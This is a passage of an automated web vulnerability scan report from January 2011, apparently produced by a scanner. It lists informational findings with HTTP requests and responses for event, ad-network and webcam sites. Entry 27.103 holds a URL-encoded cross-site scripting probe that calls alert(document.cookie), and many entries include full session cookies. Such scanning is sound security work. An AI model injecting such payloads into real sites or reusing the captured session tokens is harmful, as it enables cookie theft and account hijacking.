Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:03 GMT
Content-Type: text/html
Connection: keep-alive
Expires: Sun, 30 Jan 2011 05:28:03 GMT
Cache-Control: max-age=86400
Content-Length: 5040

<html>
<head><title>Movies showing near Albany,NY</title><META NAME="ROBOTS" CONTENT="NOINDEX,FOLLOW"></head>
<body>
<a href='/movies/show/261885-127-hours'>127 Hours Drama Movie</a><br/>
<a href='/m
...[SNIP]...

27.92. http://events.cbs6albany.com/site_indexes/allvenueslist150m0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/site_indexes/allvenueslist150m0.html

Request

GET /site_indexes/allvenueslist150m0.html HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:05 GMT
Content-Type: text/html
Connection: keep-alive
Expires: Sun, 30 Jan 2011 05:28:05 GMT
Cache-Control: max-age=86400
Content-Length: 427519

<html>
<head><title>Events & Activities Venues near Albany,NY</title><META NAME="ROBOTS" CONTENT="NOINDEX,FOLLOW"></head>
<body>
<a href='/troy-ny/venues/show/4336145-st-augustines-winter-snowball'>St
...[SNIP]...

27.93. http://events.cbs6albany.com/site_indexes/restaurantlist150m0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/site_indexes/restaurantlist150m0.html

Request

GET /site_indexes/restaurantlist150m0.html HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:05 GMT
Content-Type: text/html
Connection: keep-alive
Expires: Sun, 30 Jan 2011 05:28:05 GMT
Cache-Control: max-age=86400
Content-Length: 249630

<html>
<head><title>Restaurants near Albany,NY</title><META NAME="ROBOTS" CONTENT="NOINDEX,FOLLOW"></head>
<body>
<a href='/albany-ny/venues/show/4338605-pf-changs-albany'>P.F. Chang's - Albany in Alb
...[SNIP]...

27.94. http://events.cbs6albany.com/site_indexes/theaterlist150m0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/site_indexes/theaterlist150m0.html

Request

GET /site_indexes/theaterlist150m0.html HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:03 GMT
Content-Type: text/html
Connection: keep-alive
Expires: Sun, 30 Jan 2011 05:28:03 GMT
Cache-Control: max-age=86400
Content-Length: 5749

<html>
<head><title>theaters near Albany,NY</title><META NAME="ROBOTS" CONTENT="NOINDEX,FOLLOW"></head>
<body>
<a href='/queensbury-ny/venues/show/42768-regal-aviation-mall-7'>Regal Aviation Mall 7 in
...[SNIP]...

27.95. http://hpi.rotator.hadj7.adjuggler.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hpi.rotator.hadj7.adjuggler.net
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ajess1_ADC1D6F3ECF9BDEC48AA769B=a; ajcmp=20236X00631Sh00PZ

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Fri, 28 Jan 2011 16:44:07 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /favicon.ico not found</pre>
<BR>

27.96. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Request

GET /ptj HTTP/1.1
Host: ib.adnxs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acb266870=; anj=Kfu=8fG7*@DYS3+0s]#%2L_'x%SEV/i#-2N=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o@X$D@^v; icu=EAAYAA..; acb781784=; acb502322=; acb437727=; acb217792=; uuid2=4760492999213801733; acb810948=; acb458625=; acb64287=; acb322141=; acb119885=; acb780011=; acb120773=; acb510504=; sess=1; acb725885=5_[r^208WMM2x@N!@@-#43LyA?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQlAPN9PjZduwj97FK5H4XrEP5TFsK1Hqr8OBWHfHSmrEEL2WENNAAAAANc8AwA3AQAAsQAAAAIAAAB4xgEAsl4AAAEAAABVU0QAVVNEACwB-gCqAQAA_gYBAgUCAAUAAAAAwyMSswAAAAA.&tt_code=cm.quadbostonherald&udj=uf%28%27a%27%2C+379%2C+1296259318%29%3Buf%28%27r%27%2C+116344%2C+1296259318%29%3B&cnd=!0RVLXwic0QEQ-IwHGAAgsr0BKAAxexSuR-F6xD9CEwgAEAAYACABKP7__________wFIAFAAWKoDYABosQE.; acb402178=;

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Sat, 29 Jan 2011 04:49:47 GMT
Content-Length: 134
Connection: close

<HTML><HEAD>
<TITLE>400 Bad Request</TITLE>
</HEAD><BODY>
<H1>Method Not Implemented</H1>
Invalid method in request<P>
</BODY></HTML>

27.97. http://ib.adnxs.com/ttj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ttj

Request

GET /ttj HTTP/1.1
Host: ib.adnxs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acb266870=; anj=Kfu=8fG7*@DYS3+0s]#%2L_'x%SEV/i#-2N=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o@X$D@^v; icu=EAAYAA..; acb781784=; acb502322=; acb437727=; acb217792=; uuid2=4760492999213801733; acb810948=; acb458625=; acb64287=; acb322141=; acb119885=; acb780011=; acb120773=; acb510504=; sess=1; acb725885=5_[r^208WMM2x@N!@@-#43LyA?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQlAPN9PjZduwj97FK5H4XrEP5TFsK1Hqr8OBWHfHSmrEEL2WENNAAAAANc8AwA3AQAAsQAAAAIAAAB4xgEAsl4AAAEAAABVU0QAVVNEACwB-gCqAQAA_gYBAgUCAAUAAAAAwyMSswAAAAA.&tt_code=cm.quadbostonherald&udj=uf%28%27a%27%2C+379%2C+1296259318%29%3Buf%28%27r%27%2C+116344%2C+1296259318%29%3B&cnd=!0RVLXwic0QEQ-IwHGAAgsr0BKAAxexSuR-F6xD9CEwgAEAAYACABKP7__________wFIAFAAWKoDYABosQE.; acb402178=;

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Sat, 29 Jan 2011 04:49:50 GMT
Content-Length: 134
Connection: close

<HTML><HEAD>
<TITLE>400 Bad Request</TITLE>
</HEAD><BODY>
<H1>Method Not Implemented</H1>
Invalid method in request<P>
</BODY></HTML>

27.98. http://imlive.com/categoryfs.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/categoryfs.asp

Request

Response

27.99. http://imlive.com/categoryms.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/categoryms.asp

Request

Response

27.100. http://imlive.com/compliance.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/compliance.asp

Request

GET /compliance.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:42 GMT
Connection: close
Content-Length: 1925
Vary: Accept-Encoding

<html>
<head>
<title>Compliance - Live Video Chat at ImLive</title>
<meta name="description" content="Our live video chat hosts are at least 18 years old. ImLive complies with 18 U.S.C. §&nbsp
...[SNIP]...

27.101. http://imlive.com/disclaimer.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/disclaimer.asp

Request

Response

27.102. http://imlive.com/homepagems3.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/homepagems3.asp

Request

Response

27.103. http://imlive.com/homepagems3.asp244f6%27%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e7358040fd9f previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/homepagems3.asp244f6%27%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e7358040fd9f

Request

Response

27.104. http://imlive.com/liveexperts.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/liveexperts.asp

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:11:18 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmsTHmj4p7KUq0DeR%2BO3xTkb; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:18 GMT
Connection: close
Content-Length: 19369
Vary: Accept-Encoding

<html>
   <head>
       <title>live webcam video chat with experts at imlive</title>
       <meta name="description" content="Live video chat sessions with experts in just about anything - Mysticism & Spir
...[SNIP]...

27.105. http://imlive.com/localcompanionship.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/localcompanionship.asp

Request

Response

27.106. http://imlive.com/minglesingles.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/minglesingles.asp

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:11:18 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:19 GMT
Connection: close
Content-Length: 16092
Vary: Accept-Encoding

<html>
   <head>
       <title>Mingle With Friends on Live Webcam Video Chat at ImLive</title>
       <meta name="description" content="Mingle with Singles on live webcam video chat - Find a match and go on
...[SNIP]...

27.107. http://imlive.com/pr.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/pr.asp

Request

Response

27.108. http://imlive.com/sex_webcams_index/index.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/sex_webcams_index/index.asp

Request

Response

27.109. http://imlive.com/sitemap.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/sitemap.html

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:23:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2FSf8bs6wRlvXx1sFag%3D%3D; path=/
Set-Cookie: ix=k; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:23:00 GMT
Connection: close
Content-Length: 33732
Vary: Accept-Encoding

<html>
<head>
<meta name="keywords" content="live Video Chat, Video Chat live, Video Chat live, live Video Chat, webcam chat, live web cam, webcam live, live webcam, web cam live, web cam communti
...[SNIP]...

27.110. http://imlive.com/videosfr.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/videosfr.asp

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:11:20 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:21 GMT
Connection: close
Content-Length: 15706
Vary: Accept-Encoding

<html>
   <head>
       <title>Video Chat Recorded on Webcam at ImLive</title>
       <meta name="description" content="Come in and discover what our hosts have recorded in Friends & Romance live webcam vide
...[SNIP]...

27.111. http://imlive.com/warningms.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/warningms.asp

Request

Response

27.112. http://jqueryui.com/about previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/about

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

27.113. http://jqueryui.com/themeroller/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Request

GET /themeroller/ HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

27.114. http://main.oggifinogi.com/OggiPlayerService/PlayerProxy.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://main.oggifinogi.com
Path:	/OggiPlayerService/PlayerProxy.aspx

Request

GET /OggiPlayerService/PlayerProxy.aspx?id=92893396-e0b6-4c83-8a05-c0a43993b46b&campaignId=07b24386-4c5b-4ca7-8b27-6adc092e2aef HTTP/1.1
Host: main.oggifinogi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:59:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-From-Cache: False
Cache-Control: public
Last-Modified: Wed, 17 Nov 2010 19:11:59 GMT
ETag: MjAxMC0xMS0xNyAxOToxMTo1OQ==
Vary: *
Content-Type: text/html
Connection: close
Content-Length: 12002

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="PlayerHead"><title>
Player
</title>
<style type="text/css">
.hand {cursor:pointer}
</style>
<!--[if IE]>
<sty
...[SNIP]...

27.115. http://mig.nexac.com/2/B3DM/DLX/1@x96 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mig.nexac.com
Path:	/2/B3DM/DLX/1@x96

Request

Response

27.116. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom3

Request

Response

27.117. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/243052316@Bottom3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/243052316@Bottom3

Request

Response

27.118. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/311285161@Bottom3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/311285161@Bottom3

Request

Response

27.119. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3

Request

Response

27.120. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/509694158@Bottom3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/509694158@Bottom3

Request

Response

27.121. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3

Request

Response

27.122. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3

Request

Response

27.123. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3

Request

Response

27.124. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom3

Request

Response

27.125. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3

Request

Response

27.126. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3

Request

Response

27.127. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom3

Request

Response

27.128. http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/1[randomNo]@x90]] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/1[randomNo]@x90]]

Request

GET /RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/1[randomNo]@x90]] HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:08:55 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 325
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html

<A HREF="http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/video/1[randomNo]/549376271/x90]]/default/empty.gif/72634857383031444f386b4144567663?x" target="_top"><I
...[SNIP]...

